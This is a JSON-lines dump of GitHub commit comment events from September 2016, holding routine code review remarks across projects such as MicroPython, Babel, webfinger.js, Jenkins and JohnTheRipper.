{"id":"4514149469","type":"CommitCommentEvent","actor":{"login":"nzjrs"},"repo":{"name":"dddomodossola/remi"},"payload":{"comment":{"id":18893812,"position":null,"line":null,"path":null,"commit_id":"1eeb7c2fc5f587177358ddac29f772b5ea2fe82b","created_at":"2016-09-04T18:12:17Z","updated_at":"2016-09-04T18:12:17Z","body":"OK. be very careful optimizing python performance without benchmarking first."}},"created_at":"2016-09-04T18:12:17Z"}
{"id":"4514149574","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18893814,"position":null,"line":null,"path":null,"commit_id":"ab5657497ec453a7566cc00d6b68bf75e5304144","created_at":"2016-09-04T18:12:20Z","updated_at":"2016-09-04T18:12:20Z","body":"I think avoiding undefined behaviour by using isdec() before atoi() is more important than getting rid of the warning."}},"created_at":"2016-09-04T18:12:20Z"}
{"id":"4514150563","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893819,"position":47,"line":182,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:13:03Z","updated_at":"2016-09-04T18:13:03Z","body":"When you pass multiple values to the constructor, not just ID, how are you going to know which of the values passed was wrong?"}},"created_at":"2016-09-04T18:13:03Z"}
{"id":"4514151119","type":"CommitCommentEvent","actor":{"login":"chrisdone"},"repo":{"name":"commercialhaskell/intero"},"payload":{"comment":{"id":18893820,"position":null,"line":null,"path":null,"commit_id":"ecd5e98380fd72e9f41671f65753e76fc0b95dc3","created_at":"2016-09-04T18:13:24Z","updated_at":"2016-09-04T18:13:24Z","body":"Oh crap. I'll fix it. That function comes from a library not standard emacs.\n\nOn 4 Sep 2016 14:39, \"Jeremy Bi\" <notifications@github.com> wrote:\n\nDebugger entered--Lisp error: (void-function replace-in-string)\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub\n<https://github.com/commercialhaskell/intero/commit/ecd5e98380fd72e9f41671f65753e76fc0b95dc3#commitcomment-18892996>,\nor mute the thread\n<https://github.com/notifications/unsubscribe-auth/AAArC1V8KWPMgM9x1g_jexOAMw21MWzQks5qmrv0gaJpZM4J0htG>\n.\n"}},"created_at":"2016-09-04T18:13:24Z"}
{"id":"4514151823","type":"CommitCommentEvent","actor":{"login":"bob-zs"},"repo":{"name":"bob-zs/Tetriz"},"payload":{"comment":{"id":18893822,"position":25,"line":41,"path":"Tetriz/GameScene.swift","commit_id":"95dc9477032b24e22c997ee6d8229705dac4217f","created_at":"2016-09-04T18:13:53Z","updated_at":"2016-09-04T18:13:53Z","body":"What is the point of this, really?"}},"created_at":"2016-09-04T18:13:53Z"}
{"id":"4514152005","type":"CommitCommentEvent","actor":{"login":"chalasr"},"repo":{"name":"lexik/LexikJWTAuthenticationBundle"},"payload":{"comment":{"id":18893823,"position":13,"line":25,"path":"DependencyInjection/Security/Factory/JWTFactory.php","commit_id":"b0e7af53a6e631b7f4c84d85b481a6e5111d162c","created_at":"2016-09-04T18:14:01Z","updated_at":"2016-09-04T18:14:01Z","body":"Even with the conditions, scrutinizer stucks."}},"created_at":"2016-09-04T18:14:01Z"}
{"id":"4514154113","type":"CommitCommentEvent","actor":{"login":"BmdOnline"},"repo":{"name":"BmdOnline/domoticz"},"payload":{"comment":{"id":18893826,"position":null,"line":null,"path":null,"commit_id":"74506d673ae542713eeefe5ac01d4ecd5441c538","created_at":"2016-09-04T18:15:27Z","updated_at":"2016-09-04T18:15:27Z","body":"Issue #276\r\nAllow multiple groups when MySensors send its childs."}},"created_at":"2016-09-04T18:15:27Z"}
{"id":"4514154215","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893827,"position":null,"line":null,"path":null,"commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:15:30Z","updated_at":"2016-09-04T18:15:30Z","body":"Docs updated in 20da9064d7492b2f37a2140c17e468fb5785a593."}},"created_at":"2016-09-04T18:15:30Z"}
{"id":"4514154238","type":"CommitCommentEvent","actor":{"login":"Kroisse"},"repo":{"name":"rust-kr/rust-kr.org"},"payload":{"comment":{"id":18893828,"position":null,"line":null,"path":null,"commit_id":"236239e5e22b72eb7c75f49ef4b6bf733e29dbee","created_at":"2016-09-04T18:15:31Z","updated_at":"2016-09-04T18:15:31Z","body":"일단 함수로 좀 쨰죠 (...)"}},"created_at":"2016-09-04T18:15:31Z"}
{"id":"4514156791","type":"CommitCommentEvent","actor":{"login":"Kroisse"},"repo":{"name":"rust-kr/rust-kr.org"},"payload":{"comment":{"id":18893836,"position":null,"line":null,"path":null,"commit_id":"236239e5e22b72eb7c75f49ef4b6bf733e29dbee","created_at":"2016-09-04T18:17:13Z","updated_at":"2016-09-04T18:17:13Z","body":"```\r\nlet IronError { error, response } = err;\r\nErr(IronError::new(error, response.set(\"Not found\")))\r\n```\r\n이 정도로는 안 되려나요?"}},"created_at":"2016-09-04T18:17:13Z"}
{"id":"4514157013","type":"CommitCommentEvent","actor":{"login":"yunsup"},"repo":{"name":"ucb-bar/rocket-chip"},"payload":{"comment":{"id":18893837,"position":22,"line":88,"path":"src/main/scala/coreplex/Coreplex.scala","commit_id":"f34843f1b9f567caca4b213a7541b225c6bbb169","created_at":"2016-09-04T18:17:20Z","updated_at":"2016-09-04T18:17:20Z","body":"I gave four spaces deliberately, because it's not an argument for the function."}},"created_at":"2016-09-04T18:17:20Z"}
{"id":"4514157379","type":"CommitCommentEvent","actor":{"login":"lash750"},"repo":{"name":"lash750/Alma_test1"},"payload":{"comment":{"id":18893839,"position":null,"line":null,"path":null,"commit_id":"fcce4029b7cb4710a81e112ca5724f35e1e7e374","created_at":"2016-09-04T18:17:33Z","updated_at":"2016-09-04T18:17:33Z","body":"1"}},"created_at":"2016-09-04T18:17:33Z"}
{"id":"4514158130","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893842,"position":17,"line":200,"path":"docs/esp8266/quickref.rst","commit_id":"20da9064d7492b2f37a2140c17e468fb5785a593","created_at":"2016-09-04T18:18:02Z","updated_at":"2016-09-04T18:18:02Z","body":"This is my mistake, but I just noticed it, this line misses :: at the end."}},"created_at":"2016-09-04T18:18:02Z"}
{"id":"4514159181","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893846,"position":null,"line":null,"path":null,"commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:18:46Z","updated_at":"2016-09-04T18:18:46Z","body":"It feels weird to be reviewing merged changes."}},"created_at":"2016-09-04T18:18:46Z"}
{"id":"4514159684","type":"CommitCommentEvent","actor":{"login":"surminus"},"repo":{"name":"NotRossKemp/stuff"},"payload":{"comment":{"id":18893848,"position":null,"line":null,"path":null,"commit_id":"2195f2d7d113f338af3129ae69e26bf210b37763","created_at":"2016-09-04T18:19:05Z","updated_at":"2016-09-04T18:19:05Z","body":"You might be better doing this with str_replace() (http://www.tutorialspoint.com/python/string_replace.htm)"}},"created_at":"2016-09-04T18:19:05Z"}
{"id":"4514160002","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893849,"position":14,"line":110,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:19:16Z","updated_at":"2016-09-04T18:19:16Z","body":"There's no standard, just recommendations, different ones usable in different cases. `__repr__` should provide enough info to have insight into an object (unlike `__str__`). Anyway, \"HSPI\" there is from your code. I think it's useful to tell bitbanging SPI from hardware SPI though."}},"created_at":"2016-09-04T18:19:16Z"}
{"id":"4514163644","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18893860,"position":null,"line":null,"path":null,"commit_id":"bc9d67abbd7f2d42c028ead9f5a9d9ad73c31d85","created_at":"2016-09-04T18:21:34Z","updated_at":"2016-09-04T18:21:34Z","body":"I think someone who created an issue that mentions Java 7 just a week ago, https://github.com/IntellectualSites/PlotSquared/issues/1331, isn't joking :wink:"}},"created_at":"2016-09-04T18:21:34Z"}
{"id":"4514163922","type":"CommitCommentEvent","actor":{"login":"dddomodossola"},"repo":{"name":"dddomodossola/remi"},"payload":{"comment":{"id":18893861,"position":null,"line":null,"path":null,"commit_id":"1eeb7c2fc5f587177358ddac29f772b5ea2fe82b","created_at":"2016-09-04T18:21:46Z","updated_at":"2016-09-04T18:21:46Z","body":"Will do ;-) \r\nI would like to put some debug messages with update time on python and javascript side."}},"created_at":"2016-09-04T18:21:46Z"}
{"id":"4514164960","type":"CommitCommentEvent","actor":{"login":"mx3L"},"repo":{"name":"mx3L/serviceapp"},"payload":{"comment":{"id":18893865,"position":158,"line":207,"path":"src/serviceapp/serviceapp.cpp","commit_id":"761bb5f2048a2e983b7dc9fb1bc31de7e53471df","created_at":"2016-09-04T18:22:28Z","updated_at":"2016-09-04T18:22:28Z","body":"Hi, yes you're right, but I think you mean vector size and not a string, since m_subservice_vec is a vector. \r\nWill you create a pull?"}},"created_at":"2016-09-04T18:22:28Z"}
{"id":"4514166657","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893867,"position":47,"line":182,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:23:32Z","updated_at":"2016-09-04T18:23:32Z","body":"What do you mean \"multiple values\"? MicroPython Hardware API mandates that most arguments except are kwonly.\r\n"}},"created_at":"2016-09-04T18:23:32Z"}
{"id":"4514168994","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18893872,"position":null,"line":null,"path":null,"commit_id":"ab5657497ec453a7566cc00d6b68bf75e5304144","created_at":"2016-09-04T18:24:55Z","updated_at":"2016-09-04T18:24:55Z","body":"I leave that to @kholia. Not sure why he still use the deprecated methods."}},"created_at":"2016-09-04T18:24:55Z"}
{"id":"4514169201","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18893873,"position":null,"line":null,"path":null,"commit_id":"df66d6ef4a8c1ba4a30aab3f42bf5ebf3f70ffda","created_at":"2016-09-04T18:25:01Z","updated_at":"2016-09-04T18:25:01Z","body":"@philmmanjaro do we not actually need\r\n``if (NULL == g_getenv (\"QT_STYLE_OVERRIDE\") || g_getenv (\"QT_QPA_PLATFORMTHEME\") != \"qt5ct\") {``\r\nOR, not AND, right? :wink: "}},"created_at":"2016-09-04T18:25:01Z"}
{"id":"4514169298","type":"CommitCommentEvent","actor":{"login":"nzjrs"},"repo":{"name":"dddomodossola/remi"},"payload":{"comment":{"id":18893875,"position":null,"line":null,"path":null,"commit_id":"1eeb7c2fc5f587177358ddac29f772b5ea2fe82b","created_at":"2016-09-04T18:25:06Z","updated_at":"2016-09-04T18:25:06Z","body":"you should check out line_profiler or pyvmmonitor"}},"created_at":"2016-09-04T18:25:06Z"}
{"id":"4514169612","type":"CommitCommentEvent","actor":{"login":"games647"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18893876,"position":null,"line":null,"path":null,"commit_id":"bc9d67abbd7f2d42c028ead9f5a9d9ad73c31d85","created_at":"2016-09-04T18:25:19Z","updated_at":"2016-09-04T18:25:19Z","body":"@loveGhb Could you explain it?"}},"created_at":"2016-09-04T18:25:19Z"}
{"id":"4514170022","type":"CommitCommentEvent","actor":{"login":"skddc"},"repo":{"name":"silverbucket/webfinger.js"},"payload":{"comment":{"id":18893878,"position":35,"line":120,"path":"src/webfinger.js","commit_id":"929f16d832b2e119ceb26ba37a605d1def78e09e","created_at":"2016-09-04T18:25:40Z","updated_at":"2016-09-04T18:25:40Z","body":"I think this is incorrect. The endpoint is reachable just fine, but the resource doesn't exist. It can either mean that there aren't any Webfinger entries for anyone, or (as in 5apps' case) that there's no entry for the requested account name."}},"created_at":"2016-09-04T18:25:40Z"}
{"id":"4514170398","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893881,"position":17,"line":200,"path":"docs/esp8266/quickref.rst","commit_id":"20da9064d7492b2f37a2140c17e468fb5785a593","created_at":"2016-09-04T18:25:59Z","updated_at":"2016-09-04T18:25:59Z","body":"I'll leave it to you then, maybe you'll find more issues, to avoid patching one by one indeed. (Or will make later if nothing more will come up.)"}},"created_at":"2016-09-04T18:25:59Z"}
{"id":"4514170702","type":"CommitCommentEvent","actor":{"login":"games647"},"repo":{"name":"games647/FastLogin"},"payload":{"comment":{"id":18893882,"position":null,"line":null,"path":null,"commit_id":"b660951e1e9215a901e06568c9fa0f4e0fc65a6d","created_at":"2016-09-04T18:26:17Z","updated_at":"2016-09-04T18:26:17Z","body":"@sgdc3 It's also compatible with the new version. Just the new method doesn't exist in the old version. "}},"created_at":"2016-09-04T18:26:17Z"}
{"id":"4514171597","type":"CommitCommentEvent","actor":{"login":"skddc"},"repo":{"name":"silverbucket/webfinger.js"},"payload":{"comment":{"id":18893885,"position":22,"line":81,"path":"test/01-basics-suite.js","commit_id":"929f16d832b2e119ceb26ba37a605d1def78e09e","created_at":"2016-09-04T18:27:03Z","updated_at":"2016-09-04T18:27:03Z","body":"Probably an obsolete leftover from development?"}},"created_at":"2016-09-04T18:27:03Z"}
{"id":"4514172364","type":"CommitCommentEvent","actor":{"login":"dddomodossola"},"repo":{"name":"dddomodossola/remi"},"payload":{"comment":{"id":18893889,"position":null,"line":null,"path":null,"commit_id":"1eeb7c2fc5f587177358ddac29f772b5ea2fe82b","created_at":"2016-09-04T18:27:41Z","updated_at":"2016-09-04T18:27:41Z","body":"Ok thank you for the suggestion, never used profiling tools in python, it's the time to begin."}},"created_at":"2016-09-04T18:27:41Z"}
{"id":"4514172372","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18893890,"position":null,"line":null,"path":null,"commit_id":"bc9d67abbd7f2d42c028ead9f5a9d9ad73c31d85","created_at":"2016-09-04T18:27:41Z","updated_at":"2016-09-04T18:27:41Z","body":"@loveGhb We can help you to upgrade to java 8 if you have a vps or a dedicated server ;)"}},"created_at":"2016-09-04T18:27:41Z"}
{"id":"4514173209","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893892,"position":14,"line":110,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:28:17Z","updated_at":"2016-09-04T18:28:17Z","body":"All of programming good practices is just recommendations when you have direct commit rights.\r\n\r\nIt's from my code, because in my code that is how it was created. Now it has changed.\r\n\r\nYou can tell the implementations by the value of the first argument."}},"created_at":"2016-09-04T18:28:17Z"}
{"id":"4514173227","type":"CommitCommentEvent","actor":{"login":"Feri1358"},"repo":{"name":"zhukov/webogram"},"payload":{"comment":{"id":18893893,"position":null,"line":null,"path":null,"commit_id":"ebbbada2b033f1a5ce75b77cd05678d048a7131d","created_at":"2016-09-04T18:28:20Z","updated_at":"2016-09-04T18:28:20Z","body":"var n=Config.Schema.API.layer;return t.layer!\r\n"}},"created_at":"2016-09-04T18:28:20Z"}
{"id":"4514173461","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18893894,"position":null,"line":null,"path":null,"commit_id":"df66d6ef4a8c1ba4a30aab3f42bf5ebf3f70ffda","created_at":"2016-09-04T18:28:30Z","updated_at":"2016-09-04T18:28:30Z","body":"no. rubbish. sorry."}},"created_at":"2016-09-04T18:28:30Z"}
{"id":"4514174028","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893895,"position":47,"line":182,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:28:53Z","updated_at":"2016-09-04T18:28:53Z","body":"And it's not possible to pass a wrong value to a kwonly argument because...?"}},"created_at":"2016-09-04T18:28:53Z"}
{"id":"4514180173","type":"CommitCommentEvent","actor":{"login":"apearce"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":18893902,"position":null,"line":null,"path":null,"commit_id":"b3dca4fb5a5b775b3a893bc098dfb79a5616d720","created_at":"2016-09-04T18:32:55Z","updated_at":"2016-09-04T18:32:55Z","body":"Thanks for the reply. I am referring to babel-traverse, not babel-types, however running `npm dist-tag ls babel-traverse` also shows `latest: 6.15.0`. When I go to [https://www.npmjs.com/package/babel-traverse](https://www.npmjs.com/package/babel-traverse) it shows 6.14.0 is the latest of 47 releases.\r\n\r\nIs this an npm issue? I will try to get on the slack channel later if the problem persists for me."}},"created_at":"2016-09-04T18:32:55Z"}
{"id":"4514180882","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893904,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T18:33:20Z","updated_at":"2016-09-04T18:33:20Z","body":"Would looping over the pawns using pop_lsb(&ourPawns) solve the ordering problem?"}},"created_at":"2016-09-04T18:33:20Z"}
{"id":"4514181540","type":"CommitCommentEvent","actor":{"login":"yunsup"},"repo":{"name":"ucb-bar/rocket-chip"},"payload":{"comment":{"id":18893906,"position":null,"line":null,"path":null,"commit_id":"f34843f1b9f567caca4b213a7541b225c6bbb169","created_at":"2016-09-04T18:33:48Z","updated_at":"2016-09-04T18:33:48Z","body":"Why do you need a flatMap here?  It feels like it's more than needed here, plus it's a map.  How about something like this:\r\n\r\nmanagerEndpoints foreach { _.incoherent foreach { _ := Bool(false) } }\r\n\r\n"}},"created_at":"2016-09-04T18:33:48Z"}
{"id":"4514182072","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893907,"position":17,"line":200,"path":"docs/esp8266/quickref.rst","commit_id":"20da9064d7492b2f37a2140c17e468fb5785a593","created_at":"2016-09-04T18:34:09Z","updated_at":"2016-09-04T18:34:09Z","body":"Every patch contributed to this project is such a mental stress, that I'd rather conserve my energy and focus only on things that are absolutely necessary, with the minimal changes required."}},"created_at":"2016-09-04T18:34:09Z"}
{"id":"4514182689","type":"CommitCommentEvent","actor":{"login":"silverbucket"},"repo":{"name":"silverbucket/webfinger.js"},"payload":{"comment":{"id":18893908,"position":35,"line":120,"path":"src/webfinger.js","commit_id":"929f16d832b2e119ceb26ba37a605d1def78e09e","created_at":"2016-09-04T18:34:33Z","updated_at":"2016-09-04T18:34:33Z","body":"Sure, but how else could that be conveyed in library aside from returning the status code? What would be a better way to handle it?"}},"created_at":"2016-09-04T18:34:33Z"}
{"id":"4514183020","type":"CommitCommentEvent","actor":{"login":"mikeller"},"repo":{"name":"mikeller/openLRSng"},"payload":{"comment":{"id":18893909,"position":79,"line":600,"path":"TX.h","commit_id":"b3610b6bbac52b926673a0bb717717bfaf19941a","created_at":"2016-09-04T18:34:48Z","updated_at":"2016-09-04T18:34:48Z","body":"`frameIndex == 25` is the 26th byte, since the first byte is frameIndex 0."}},"created_at":"2016-09-04T18:34:48Z"}
{"id":"4514183693","type":"CommitCommentEvent","actor":{"login":"mikeller"},"repo":{"name":"mikeller/openLRSng"},"payload":{"comment":{"id":18893910,"position":82,"line":603,"path":"TX.h","commit_id":"b3610b6bbac52b926673a0bb717717bfaf19941a","created_at":"2016-09-04T18:35:15Z","updated_at":"2016-09-04T18:35:15Z","body":"See above."}},"created_at":"2016-09-04T18:35:15Z"}
{"id":"4514184338","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18893911,"position":null,"line":null,"path":null,"commit_id":"ecbbceb5b450e89ba1dce3ead5c1fa2924efbb6b","created_at":"2016-09-04T18:35:42Z","updated_at":"2016-09-04T18:35:42Z","body":"Just let me know when you're ready for me to put this work into 1 commit and integrated into the current codebase (in order to get it reviewed and into the codebase)."}},"created_at":"2016-09-04T18:35:42Z"}
{"id":"4514184822","type":"CommitCommentEvent","actor":{"login":"silverbucket"},"repo":{"name":"silverbucket/webfinger.js"},"payload":{"comment":{"id":18893912,"position":22,"line":81,"path":"test/01-basics-suite.js","commit_id":"929f16d832b2e119ceb26ba37a605d1def78e09e","created_at":"2016-09-04T18:36:03Z","updated_at":"2016-09-04T18:36:03Z","body":"When I wrote this test (with fallback enabled) I found that gmail.com actually hosts a webfinger endpoint now, so it's not returning a 404, but a 200, with a message about it being a placeholder for future work."}},"created_at":"2016-09-04T18:36:03Z"}
{"id":"4514185231","type":"CommitCommentEvent","actor":{"login":"loganfsmyth"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":18893913,"position":null,"line":null,"path":null,"commit_id":"b3dca4fb5a5b775b3a893bc098dfb79a5616d720","created_at":"2016-09-04T18:36:21Z","updated_at":"2016-09-04T18:36:21Z","body":"The npm website is aggresively cached, the CLI is the best way to get up-to-date registry info."}},"created_at":"2016-09-04T18:36:21Z"}
{"id":"4514185259","type":"CommitCommentEvent","actor":{"login":"briansmith"},"repo":{"name":"briansmith/ring"},"payload":{"comment":{"id":18893914,"position":7,"line":87,"path":"crypto/bn/convert.c","commit_id":"d77a17917fd3f1cd0b1e0077207f29d62e4fb864","created_at":"2016-09-04T18:36:23Z","updated_at":"2016-09-04T18:36:23Z","body":"Yes, this won't work because some things we pass to `BN_bin2bn` are in fact zero-padded in the front. Instead, we'll need to handle this in the relevant callers."}},"created_at":"2016-09-04T18:36:23Z"}
{"id":"4514185683","type":"CommitCommentEvent","actor":{"login":"killman"},"repo":{"name":"killman/broadcast"},"payload":{"comment":{"id":18893915,"position":null,"line":null,"path":null,"commit_id":"867f9d74a4a6b8fb62b45f5ba7e4c560faf744e8","created_at":"2016-09-04T18:36:42Z","updated_at":"2016-09-04T18:36:42Z","body":"@deAmeisingAcer spanglish"}},"created_at":"2016-09-04T18:36:42Z"}
{"id":"4514187919","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18893920,"position":null,"line":null,"path":null,"commit_id":"8a615fd61c46eade893eda7f3a0efbcfccc48e60","created_at":"2016-09-04T18:38:19Z","updated_at":"2016-09-04T18:38:19Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-04T18:38:19Z"}
{"id":"4514188056","type":"CommitCommentEvent","actor":{"login":"wigginst"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18893922,"position":149,"line":393,"path":"Part_II_Theory/2B._rotational_invariant_expansion.tex","commit_id":"6cae09ea37bf49e4ce9e84ae950f8dc4fae57d04","created_at":"2016-09-04T18:38:26Z","updated_at":"2016-09-04T18:38:26Z","body":"Because it refers to 'combination' (singular), not 'projections' (plural)."}},"created_at":"2016-09-04T18:38:26Z"}
{"id":"4514189694","type":"CommitCommentEvent","actor":{"login":"wigginst"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18893927,"position":162,"line":409,"path":"Part_II_Theory/2B._rotational_invariant_expansion.tex","commit_id":"6cae09ea37bf49e4ce9e84ae950f8dc4fae57d04","created_at":"2016-09-04T18:39:38Z","updated_at":"2016-09-04T18:39:38Z","body":"I was uncertain if 'rebuild' might not be a scientific term; if it is not, it should actually be 'rebuilding'."}},"created_at":"2016-09-04T18:39:38Z"}
{"id":"4514189701","type":"CommitCommentEvent","actor":{"login":"z3r0c0d3r"},"repo":{"name":"z3r0c0d3r/Debian"},"payload":{"comment":{"id":18893928,"position":null,"line":null,"path":null,"commit_id":"78d08015b08dab6424c5cf4f39067962edf9c9ff","created_at":"2016-09-04T18:39:38Z","updated_at":"2016-09-04T18:39:38Z","body":"new"}},"created_at":"2016-09-04T18:39:38Z"}
{"id":"4514195120","type":"CommitCommentEvent","actor":{"login":"millette"},"repo":{"name":"alainf/feverish"},"payload":{"comment":{"id":18893936,"position":null,"line":null,"path":null,"commit_id":"b4ecaa7baecc58cbca510aa09e8936698dcd0b74","created_at":"2016-09-04T18:43:25Z","updated_at":"2016-09-04T18:43:25Z","body":"ack (en cours)"}},"created_at":"2016-09-04T18:43:25Z"}
{"id":"4514196427","type":"CommitCommentEvent","actor":{"login":"pgiffuni"},"repo":{"name":"pstef/freebsd_indent"},"payload":{"comment":{"id":18893939,"position":null,"line":null,"path":null,"commit_id":"11470baaf986b58a1b3d2456a51416e2b23e0662","created_at":"2016-09-04T18:44:14Z","updated_at":"2016-09-04T18:44:14Z","body":"Perhaps I should merge this already? I hate the thought of having regressions upstream."}},"created_at":"2016-09-04T18:44:14Z"}
{"id":"4514196439","type":"CommitCommentEvent","actor":{"login":"dskrvk"},"repo":{"name":"jenkinsci/jenkins"},"payload":{"comment":{"id":18893938,"position":null,"line":null,"path":null,"commit_id":"d6009e0e7607fdf5797c1bfaf075b0b0c2f70f53","created_at":"2016-09-04T18:44:14Z","updated_at":"2016-09-04T18:44:14Z","body":"Something seems missing here :)"}},"created_at":"2016-09-04T18:44:14Z"}
{"id":"4514204256","type":"CommitCommentEvent","actor":{"login":"Taapat"},"repo":{"name":"mx3L/serviceapp"},"payload":{"comment":{"id":18893948,"position":158,"line":207,"path":"src/serviceapp/serviceapp.cpp","commit_id":"761bb5f2048a2e983b7dc9fb1bc31de7e53471df","created_at":"2016-09-04T18:49:44Z","updated_at":"2016-09-04T18:49:44Z","body":"Maybe correct yourself."}},"created_at":"2016-09-04T18:49:44Z"}
{"id":"4514208176","type":"CommitCommentEvent","actor":{"login":"teresathen"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18893958,"position":null,"line":null,"path":null,"commit_id":"92606c95ec003607d43bb68325a009a8f75352db","created_at":"2016-09-04T18:52:25Z","updated_at":"2016-09-04T18:52:25Z","body":"Layout finde ich gut so!\r\n\r\nWenn das mit dem SearchView klappt, wärs natürlich super! Wenn nicht, ist aber auch nicht so schlimm.."}},"created_at":"2016-09-04T18:52:25Z"}
{"id":"4514208984","type":"CommitCommentEvent","actor":{"login":"gladuz"},"repo":{"name":"briannesbitt/Carbon"},"payload":{"comment":{"id":18893961,"position":25,"line":25,"path":"src/Carbon/Lang/uz.php","commit_id":"928eea2a1ea4dbd922f484f263d7374460a11ebe","created_at":"2016-09-04T18:53:04Z","updated_at":"2016-09-04T18:53:04Z","body":":time keyin - is correct"}},"created_at":"2016-09-04T18:53:04Z"}
{"id":"4514211226","type":"CommitCommentEvent","actor":{"login":"rekhasingh364"},"repo":{"name":"rekhasingh364/hello-world"},"payload":{"comment":{"id":18893963,"position":null,"line":null,"path":null,"commit_id":"2ac95a6b6e5776848ffd87b4e0699b35195dd4b2","created_at":"2016-09-04T18:54:44Z","updated_at":"2016-09-04T18:54:44Z","body":"hello..:)"}},"created_at":"2016-09-04T18:54:44Z"}
{"id":"4514212027","type":"CommitCommentEvent","actor":{"login":"oleg-nenashev"},"repo":{"name":"jenkinsci/jenkins"},"payload":{"comment":{"id":18893965,"position":null,"line":null,"path":null,"commit_id":"d6009e0e7607fdf5797c1bfaf075b0b0c2f70f53","created_at":"2016-09-04T18:55:19Z","updated_at":"2016-09-04T18:55:19Z","body":"I'm working on it. It's a semi-automatic flow"}},"created_at":"2016-09-04T18:55:19Z"}
{"id":"4514212458","type":"CommitCommentEvent","actor":{"login":"connorshea"},"repo":{"name":"danger/danger"},"payload":{"comment":{"id":18893966,"position":12,"line":131,"path":"lib/danger/danger_core/plugins/dangerfile_gitlab_plugin.rb","commit_id":"580ce6b91f05c1289648c597d5ab8e73eda62929","created_at":"2016-09-04T18:55:38Z","updated_at":"2016-09-04T18:55:38Z","body":"PR? ;)"}},"created_at":"2016-09-04T18:55:38Z"}
{"id":"4514212551","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893967,"position":14,"line":110,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:55:43Z","updated_at":"2016-09-04T18:55:43Z","body":"Direct commit rights don't come on its own. Pace of changes in MicroPython require exercising them (an alternative was to insists that you made them).\r\n\r\n> You can tell the implementations by the value of the first argument.\r\n\r\nI can, you can, somebody else not necessarily. Anyway, if you want to change that, feel free to prepare a patch (or if you feel that now I should make them, feel free to tell that; my usual approach is not to do more changes than necessary).\r\n"}},"created_at":"2016-09-04T18:55:43Z"}
